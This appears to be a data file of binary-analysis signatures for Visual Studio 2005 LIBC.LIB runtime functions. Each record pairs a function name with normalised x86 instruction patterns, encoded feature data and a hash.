zEkqZospnIrChdv6sAAAAAKF2/q9sHce8AAAAAxJKmaNjNBKYAAAAA2wdx70vTtWlY2ig6JKOZXNjNBKYAAAAA2M0EpiSjmVzEkqZoxJKmaNjNBKYAAAAAWNooOgDza+xy6DpFJKOZXNjNBKYAAAAA2M0EpiSjmVzEkqZocug6RXYJzLWn6f7ixJKmaNjNBKYAAAAAp+n+4ihdv6sAAAAAErMZTh0qflkAAAAAJKOZXNjNBKYAAAAAAPNr7Chdv6sAAAAA2M0EpiSjmVzEkqZop+n+4ihdv6sAAAAAS9O1aShdv6sAAAAAKF2/q3YJzLUAAAAAJKOZXFNNgfMAAAAAdgnMtSbu4WXYzQSmU02B8x2KnlIAAAAAHYqeUk6gi7EAAAAATqCLsQAAAAAAAAAAHSp+WeBkhW0YouAxGKLgMeBkhW0AAAAA4GSFbSot90GuLGBGrixgRpQkIM0AAAAAKi33QZQkIM0AAAAAlCQgzR2KnlIDQ9VuA0PVbnSsXG8AAAAAH2Q8XnLoOkWWc/Bf2M0Epibu4WUNzMAB75iNIx685RhmeTE1DczAAavcYA8AAAAAJu7hZavcYA8AAAAAq9xgDybu4WUnD3USJw91Eibu4WUNzMABDczAAZTOWTEAAAAAJu7hZZTOWTEAAAAAlM5ZMSbu4WUnD3USlnPwX3LoOkUAAAAADczAAZwdSkIAAAAAcug6RbzXg/BYWXafJu7hZZwdSkIAAAAAWFl2n7zXg/AAAAAAnB1KQibu4WUnD3USvNeD8B2KnlLszR78Jw91Eibu4WUNzMABDczAAZwdSkIAAAAAH9s9XiMeC7voVavaJu7hZZwdSkIAAAAAnB1KQibu4WUnD3US6FWr2iMeC7voVavaJw91Eibu4WUNzMAB,[],2c38bfc9715c69458a45e4eec7edf129d9643ce6,VS2005,LIBC.LIB
+__AdjustLocation,"MOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,R32\nJCC CONST",u7ZcLAGhdbOchlE4nIZROFhZdp+7tlwsu7ZcLAGhdbNYWXafWFl2nwGhdbMAAAAAAaF1swAAAAAAAAAAFjgIIgGhdbO7tlws,[],c6089ec1e5dde736f78ebb0c7a76f75fd2686a83,VS2005,LIBC.LIB
+__SetTag,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nLEA R32,DWORD PTR DS:[R32+R32]\nPOP R32\nSHL R32,R8\nSHL R32,R8\nMOV R32,DWORD PTR SS:[ESP+CONST]",v6zGrwAAAAAAAAAA,[],6b8797d73778ffac8aec862cf845d05337f8fc7a,VS2005,LIBC.LIB
+__UpdateFpCtxt,"PUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",oIsRwBotFtcAAAAAP8N6xQAAAAAAAAAAGi0W1z/DesWgixHA91t2VhotFtegixHAoIsRwD/DesUAAAAA,[],3cd1cd80b0366af8d388290b2de48f38369fcf19,VS2005,LIBC.LIB
+__SetFpRegVal,"XOR R32,R32\nCMP R32,R32\nSETE R8\nDEC R32\nAND R32,CONST\nINC R32\nINC R32\nJMP SHORT CONST",B/2JQbE/NswAAAAAsT82zCcXZ28AAAAAJxdnbwDh1msAAAAAQNxHvwDh1mu7tlws3xPA5Qf9iUGchlE4psr/CycXZ28AAAAAAOHWawAAAAAAAAAAnIZROAf9iUHWfO4Mu7ZcLADh1mtt/Op91nzuDLE/NswAAAAAbfzqfd8TwOWmyv8L,[],a0978012b89877f285004549b831c97d5595f39c,VS2005,LIBC.LIB
+__IsMemoryLocation,PUSH CONST\nPOP R32\nRETN,Ug74tAAAAAAAAAAAzSwRplLONpVSDvi0zSwRplLONpXNLBGmUs42lQAAAAAAAAAA,[],5f7d78919ca0676e5edd4534ff749c548396c2b7,VS2005,LIBC.LIB
+__UpdateResult,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCMP R32,CONST\nPUSH R32\nJCC CONST",xAVusjlafGAAAAAA1MwuW6NEOROHo219BJYM7TlafGAAAAAAh6NtfTlafGBO/QsUUKhdxsQFbrIAAAAATv0LFDj298S7tlwsu7ZcLGDtVPG7tlwsOPb3xDlafGAAAAAAu7ZcLCZJkLFO/QsUTv0LFDlafGBtWNTGbVjUxjlafGAAAAAAo0Q5EzlafGAAAAAAJkmQsTlafGAAAAAAu7ZcLCEMERqX2nuUl9p7lM0kGG+X2nuUl9p7lICiHmmX2nuUl9p7lDlafGCAoh5pgKIeaTlafGAAAAAAYO1U8VCoXcaX2nuUl9p7lASWDO2X2nuUl9p7lP3CesZikSyszSQYbzlafGAAAAAAYpEsrDlafGBvI/3ZbyP92TlafGAAAAAAIQwRGjlafGAAAAAAjzAOrru2XCzUzC5b/cJ6xsQFbrIAAAAAOVp8YAAAAAAAAAAA,[],c80225808648595079878c7ebea0402cf4e8d202,VS2005,LIBC.LIB
+__lseek,"MOV R32,R32\nMOV R32,R32\nSAR R32,CONST\nAND R32,CONST\nLEA R32,DWORD PTR DS:[R32*4]\nSHL CONST2,CONST\nMOV R32,DWORD PTR DS:[R32]\nTEST BYTE PTR DS:[R32+R32+CONST],CONST",BWuvt1uVPUkZpmb/Ju7hZXLoOkUAAAAA8jwvCoZ2O+cFa6+3lVAczHLoOkUAAAAAJKOZXDlafGAAAAAAOVp8YAAAAAAAAAAAGaZm/ySjmVwAAAAAZSrbFTlafGAAAAAAbs+K0YZ2O+fyPC8KhnY75ySjmVwAAAAAW5U9SSbu4WWVUBzMcug6RWUq2xU9ZCFoPWQhaCSjmVwAAAAA,[],ae66ddfe3d054eeaa19afaa87cfd0ba9e7028e00,VS2005,LIBC.LIB
+_strcoll,PUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,eUxKbwAAAAAAAAAAm5BQ/AAAAAAAAAAAWlVPAwAAAAAAAAAAS6l9YE6jm9taVU8DTqOb25uQUPx5TEpv,[],6741087ef80532d53e3f01e167cd02b2ae30e3c7,VS2005,LIBC.LIB
+__getche,"PUSH R32\nCALL CONST\nCMP R32,-1\nPOP R32\nJCC CONST",PZ4u7sK8QFYFa6+3bdhe5T2eLu7AHxu9BWuvt8K8QFZPi8wKwB8bvQAAAAAAAAAAT4vMCgAAAAAAAAAAwrxAVgAAAAAAAAAA,[],685a74244069c094bd5c62c5dc55e8b07685852e,VS2005,LIBC.LIB
+__getch,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nOR R32,CONST\nCMP R32,R32\nJCC CONST",svQZiP7AyYXwuJ9SrN+z5gAAAAAAAAAAu7ZcLETFJ8PBjO7v/Jp1KOMYVYkAAAAA4xhVibHFD4GchlE48LifUlAOfY78mnUowYzu70TFJ8MAAAAAYFXvCwAAAAAAAAAAnIZROLHFD4HP62IcRMUnw7HFD4GchlE4UA59jv7AyYUAAAAAz+tiHPyadSichlE4scUPgQAAAAAAAAAAS6l9YLu2XCys37Pm/sDJhQAAAAAAAAAAsBHNAEupfWBgVe8LnIZROPyadSiy9BmI,[],f54ab4d6a1450c62e8973bea981a59c58d114b17,VS2005,LIBC.LIB
+__ungetch,"MOV R32,DWORD PTR SS:[ESP+CONST]\nCMP R32,-1\nJCC CONST",m5BQ/AAAAAAAAAAA32ZuS5uQUPwkA8OdJAPDnZuQUPxMJi9OTCYvTgAAAAAAAAAA,[],03d89947f0bc70053b0c44c115267dcc3ea41855,VS2005,LIBC.LIB
+__kbhit,"LEA R32,DWORD PTR DS:[R32+R32*4]\nSHL CONST,CONST\nADD CONST2,CONST\nAND R8,CONST\nCALL CONST\nMOV R32,ESP\nTEST R32,R32\nJCC CONST",/zz8GwAAAAAAAAAAMwVMOgAAAAAAAAAAJAPDnXe8TDFnLrgpMQ8Pbf88/BsuVbn+DQwOIDMFTDoAAAAAiFwj6w0MDiDNT+DREeWUnv88/BsuVbn+Zy64Kf88/BsxDw9tcug6Rf88/BufS2Q9LlW5/v88/BtQZ3X1247+rQ0MDiAkA8OdzU/g0elYYev/PPwbd7xMMf88/BsxDw9tLlW5/v88/BvfE8Dl6Vhh681P4NHfE8DlUGd19f88/BsR5ZSeJw91Eg0MDiCIXCPr3xPA5c1P4NEnD3US3xPA5f88/Bty6DpFn0tkPc1P4NHfE8Dl,[],4fd0c4234044388aa9d4e33995f78d5dace54a0d,VS2005,LIBC.LIB
+_fclose,"PUSH R32\nCALL CONST\nAND DWORD PTR DS:[R32+CONST],0\nPOP R32\nMOV R32,R32\nAND DWORD PTR DS:[R32+CONST],0\nPOP R32\nPOP R32",Uqv46tjNBKbEkqZoEvpi9gAAAAAAAAAAKfHZrAAAAAAAAAAApRxQyAAAAAAAAAAAxJKmaKUcUMgAAAAA2M0Epinx2azEaJUgxJKmaCnx2awAAAAAxGiVIC5Vuf7EkqZoLlW5/inx2awS+mL2,[],5931c7a85f6762ad87f1ccd4f4aef2e157962a8b,VS2005,LIBC.LIB
+__getw,"PUSH R32\nCALL CONST\nPOP R32\nMOV BYTE PTR DS:[R32],R8\nINC R32\nDEC R32\nJCC CONST",nG7J798TwOVUE5VZ6IS0lZxuye/EM7R72LLTmQAAAAAAAAAABRzv798TwOVUE5VZVBOVWcK8QFbYstOZ3xPA5Zxuye/EM7R7xDO0ewUc7+8AAAAAwrxAVgAAAAAAAAAA,[],ae492dbc23e3433dd812b5e229e59255fbdb1bc4,VS2005,LIBC.LIB
+_mbtowc,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nCMP R32,R32\nJCC CONST",AjECwcUiGaKC9xsJOVp8YAAAAAAAAAAAXqODJ3WtSw0AAAAAuyGU9nWtSw2W7PjPFaIxVgIxAsEuVbn+luz4zzlafGB1rUsNuyGU9iAWOYKP4s79LlW5/g0MDiCrbLIkda1LDTlafGAAAAAAj+LO/RWiMVYuVbn+gvcbCbshlPa7IZT2aXI4fwAAAAAAAAAAq2yyJDlafGAAAAAALlW5/iAWOYJpcjh/gDpRGTlafGC7IZT2uyGU9nWtSw2AOlEZDQwOIDlafGAAAAAAft9z5SAWOYK7IZT2xSIZog0MDiBeo4MnIBY5ggAAAAAAAAAA,[],5e6f8c52b04f3e95d3c209fe102346008b7e7792,VS2005,LIBC.LIB
+__msize,"PUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",Ls3HQQAAAAAAAAAAdcL2zQAAAAAAAAAAi1Jw/y7Nx0F1wvbN,[],abbb322e23729b352d1e5b59f1591a33e8cd8189,VS2005,LIBC.LIB
+__fFATN2,"MOV BYTE PTR SS:[EBP+CONST],CONST\nFABS\nFXCH ST(1)\nFABS\nFXCH ST(1)\nFPATAN\nOR R8,R8\nJCC CONST",iPftegGhdbPudxjT7ncY0wAAAAAAAAAAAaF1swAAAAAAAAAA/CNuHtjNBKaI9+162M0EpgGhdbPudxjT,[],bfc025f5896a84460d29089611f1aea0edca8db5,VS2005,LIBC.LIB
+__rtpiby2,FSTP ST\nFLD TBYTE PTR DS:[0]\nRETN,svJ1LwAAAAAAAAAA,[],a3ccf5baedc7d68d6a5b2ffd9f19c78cfcadf7d4,VS2005,LIBC.LIB
+_getenv,"PUSH R32\nCALL CONST\nPOP R32\nMOV R32,R32\nMOV R32,DWORD PTR DS:[R32]\nTEST R32,R32\nJCC CONST",nVxJNiAWOYJy6DpFxmv3fSAWOYKIXCPrxn+zwyAWOYIWOAgiiFwj68SSpmiTjLgqxJKmaMZr930AAAAAJ3ZhsDlafGAAAAAAFjgIIiAWOYKvBDx/cug6RRY4CCIVojFWk4y4KsSSpmivqNlxFaIxViAWOYJSaOpbIBY5ggAAAAAAAAAArwQ8fyAWOYKIXCPrr6jZcSd2YbDEkqZoOVp8YAAAAAAAAAAAUmjqWyAWOYLGf7PD,[],ee7dc9f972a1fda6f6e07f00b45710fbd54a3895,VS2005,LIBC.LIB
+__mbsstr,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nXOR R32,R32\nCMP DWORD PTR DS:[0],R32\nPUSH R32\nPUSH R32\nJCC CONST",J0aqnsepA19y6DpFcug6RcepA191XlnKEPvFzSGHeWMAAAAAuKO6D8epA19y6DpFDITgxLijug+jhXV2qpPdsgAAAAAAAAAAnvidvSdGqp4AAAAArsqgySdGqp4Q+8XNdV5ZyidGqp6uyqDJDczAAaqT3bIAAAAAj+LO/SdGqp4Q+8XNx6kDXwAAAAAAAAAAo4V1dqqT3bIAAAAAJ0aqng3MwAGe+J29IYd5YydGqp7jsvEs47LxLI/izv0nRqqe,[],7618240238b1738009ee75864a1ae2613603e735,VS2005,LIBC.LIB
+__spawnvpe,"PUSH R32\nCALL CONST\nLEA R32,DWORD PTR DS:[R32+R32+CONST]\nPOP R32\nMOV R8,BYTE PTR DS:[R32]\nCMP R8,CONST\nJCC CONST",TzfyTEYMn8Aqzxw52M0EphHs5BOns1c7IYd5YxHs5BOns1c7p7NXO1TdXBkAZGJLNXgBMlTdXBkgl7OaEezkE1TdXBkAZGJLKs8cOUYMn8Aqzxw5IJezmnqjxjUAAAAAVN1cGQAAAAAAAAAARgyfwAAAAAAAAAAAKs8cOUYMn8Agf0DzAGRiS1TdXBkkA8OdIH9A81TdXBnhj99SeqPGNVTdXBnhj99SzQZvFkYMn8DRSJSlJAPDnSCXs5o1eAEy4Y/fUlTdXBlmB4mTNXgBMoLEzKg1eAEyZgeJk9jNBKZKXPt2NXgBMlTdXBmCxMyo0UiUpUYMn8BPN/JMSlz7diGHeWMAAAAAgsTMqCCXs5o1eAEy,[],dd99a7af838ff571a3460c9e29dccc1539d89b43,VS2005,LIBC.LIB
+__splitpath,"PUSH R32\nPUSH R32\nPUSH R32\nCALL CONST\nADD ESP,CONST\nAND BYTE PTR DS:[R32+R32],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nTEST R32,R32",LlW5/uFnc/8gWB1sLlW5/i5Vuf5rVLAoMqAZtAAAAAAAAAAAQvjW1gAAAAAAAAAAa1SwKC5Vuf5y6DpF4Wdz/y5Vuf6djqlwLlW5/i5Vuf5y6DpFlvDb7+Fnc/8AAAAAcug6RS5Vuf6chlE4nIZROC5Vuf7kUryf5FK8n+Z0+C9DwYV3Q8GFd0L41tYuVbn+5nT4L0L41tYuVbn+6P6B0GGagYkAAAAAW9AV4IWgPoVb0BXgIFgdbC5Vuf6djqlwW9AV4IWgPoVb0BXgnY6pcFvQFeDo/oHQW9AV4GGagYnEBW6yLlW5/kL41tYuVbn+xAVusmGagYkAAAAAJw91Ei5Vuf4uVbn+haA+hZ2OqXDSAE6xLlW5/ubgBMI8sBgsqikjDS5Vuf4nD3USYZqBiZ2OqXDSAE6xPLAYLEL41tYAAAAA5uAEwkL41tYAAAAA0gBOsS5Vuf6chlE4nIZROKA3OqHkUryf5FK8ny0eozniuEM+LlW5/i5Vuf7kUryf4rhDPi5Vuf4AAAAALlW5/p2giDOW8Nvv5FK8n3Wvi7r/8JxQLR6jOS5Vuf4AAAAA//CcUEL41tYyoBm0da+LukL41tYyoBm0oDc6oS5Vuf4AAAAAnaCIM+Fnc/8AAAAALlW5/kL41tYyoBm0,[],e8688bc3b7ad74d2e7583af43a901f599f6a8bde,VS2005,LIBC.LIB
+_wcstod,"MOV R16,WORD PTR DS:[R32]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",3C9taQBhxEIAAAAAsdiXhLXKlZNXdgry2KSIirXKlZNXdgryRd96kEL41tYAAAAApxs8B2DXD424C8k7W9AV4OcVlkox5+jFW9AV4FvQFeCJvK8wAGHEQi9djDXcL21pMefoxRmmZv8AAAAAibyvMBmmZv/ZMcqeuAvJO1vQFeAlhRBn5xWWSgAAAAAAAAAAV3YK8rHYl4S1ypWTQvjW1gAAAAAAAAAAtcqVk2DXD424C8k7GzjENy9djDXcL21p2THKnkL41tYAAAAAJYUQZ0L41tZF33qQGaZm/0L41tYAAAAAL12MNacbPAfYpIiKYNcPjVvQFeAlhRBn,[],7ab4f4bcb317da222934352fbf8358ad9743505a,VS2005,LIBC.LIB
+_abort,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nINC R32\nPOP R32\nCMP R32,CONST",0UiUpU9cb3qtkX8C3DJx6pOvmPEaAtwlT1xvegAAAAAAAAAARTkJ406gi7EAAAAATqCLsQAAAAAAAAAAaNNIMUU5CeO0ASafrZF/Ak6gi7ER9Xmgk6+Y8U6gi7F3vEwxtAEmn06gi7EAAAAAee1GlZOvmPEaAtwlGgLcJXntRpWTr5jxEfV5oGBTNSlo00gxd7xMMU9cb3py6DpFcug6Ra2RfwLRSJSlYFM1KUU5CeO0ASaf,[],633612809d9a898ebb2466870feebaa36bd81c04,VS2005,LIBC.LIB
+_fgets,"PUSH R32\nCALL CONST\nPOP R32\nCMP R32,-1\nJCC CONST",DczAAcepA18AAAAA97yAwMsXJeCDrkNeSguQ3csXJeDfE8Dlg65DXiiCAZDEM7R73xPA5SiCAZDEM7R7u7ZcLN8TwOVKC5Dd3xPA5d8TwOXLFyXgvMZiV/e8gMANzMABxDO0e7u2XCwAAAAAyxcl4AAAAAAAAAAAx6kDXwAAAAAAAAAAOVp8YAAAAAAAAAAAKIIBkN8TwOVKC5Dd3xPA5csXJeANzMABDczAATlafGAAAAAA,[],94613c2b897852bb0a0eb06e313ecacd99488b8a,VS2005,LIBC.LIB
+__fstati64,"MOV R32,R32\nAND R32,CONST\nSAR R32,CONST\nSHL CONST2,CONST\nLEA R32,DWORD PTR DS:[R32*4]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR DS:[R32]\nADD R32,R32",oDc6oal535QAAAAAHXCMVPyp21fJbSdD/KnbVwAAAAAAAAAA2MX2RK+wn4bYxfZEj5JGQCSKTQ9IYyuu0BdCDROlFqQAAAAALokCbgAAAAAAAAAAKp+9ViSKTQ9IYyuu2MX2RK+wn4bx/ll/uyGU9jdH0eotjqF8yW0nQ/yp21en9PAALY6hfK+wn4YtjqF88f5Zf+wF1DkAAAAA48qFdC2OoXwAAAAALY6hfK+wn4aHKFbKT3tIAROlFqQtjqF8SGMrruwF1DkAAAAALY6hfBOlFqQtjqF8p/TwAASMQoC7tlwsJIpND0hjK66cgFywhyhWytjF9kS7IZT2qXnflOwF1DkAAAAALY6hfBOlFqT3d2y+u7ZcLL93Bs+7tlwsu7ZcLI+SRkCHo219nIBcsOwF1DkAAAAAh6NtfdAXQg32CvUn9gr1Jy6JAm4AAAAABIxCgCcPdRLQF0IN93dsvi2OoXy7IZT2r7CfhuwF1DkAAAAAE6UWpC6JAm4AAAAAN0fR6tjF9kS7IZT27AXUOS6JAm4AAAAAuyGU9tjF9kSgNzqhJw91Ek97SAHjyoV0v3cGzyqfvVYAAAAA,[],947d9045b145e43847e62c8ca323fd2b1f0078db,VS2005,LIBC.LIB
+__wcsnset,"MOV R32,R32\nDEC R32\nTEST R32,R32\nJCC CONST",6Vhh6wDh1msC+xpt/NQrLQDh1mvpWGHrAOHWawAAAAAAAAAAAvsabfzUKy0AAAAAIYK6PPzUKy0AAAAA,[],b23f06763aab900798d28199813352379124f7fa,VS2005,LIBC.LIB
+_fwscanf,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",bvadnQAAAAAAAAAA,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,1509d67c3643413fbcd68f9b967e0e68625d6714,VS2005,LIBC.LIB
+___crtCompareStringW,"XOR R32,R32\nCMP R32,R32\nSETGE R8\nDEC R32\nAND R32,CONST\nADD CONST2,CONST\nMOV R32,R32\nLEA ESP,DWORD PTR SS:[EBP+CONST]",/M9whQAAAAAAAAAAh6NtfUmpRj9OasPOSBgG34ejbX0AAAAAjhJ3pi5Vuf5IvwjrTmrDzkmpRj9LqX1g4qHchwAAAAAAAAAAoZ8lQ7shlPYAAAAAS6l9YLu2XCw4GfmcOBn5nOKh3IcAAAAA7eBsMoejbX1gL4wAh6NtfWZ5MTUZ/WwXSL8I60i/COuQJ+AyGf1sF2Z5MTWLImX1uyGU9mZ5MTW71WBKSL8I62Z5MTVyE5fLu9VgSmZ5MTX5tNhLchOXyy5Vuf4AAAAAkCfgMrshlPbt4GwyLlW5/rshlPbt4GwyZnkxNeKh3IcAAAAAiyJl9eKh3IcAAAAAu7ZcLGZ5MTW7IZT2uyGU9iGGTw+MouzZ+bTYS2Z5MTVIGAbfjKLs2WZ5MTWhnyVDuyGU9oejbX1gL4wAYC+MAEmpRj9OasPOIYZPD2Z5MTWhnyVDSalGP/zPcIUNDA4gDQwOIOKh3IcAAAAA,[],aa65256cdd3b4019f30b4570c1d7cfe52171adac,VS2005,LIBC.LIB
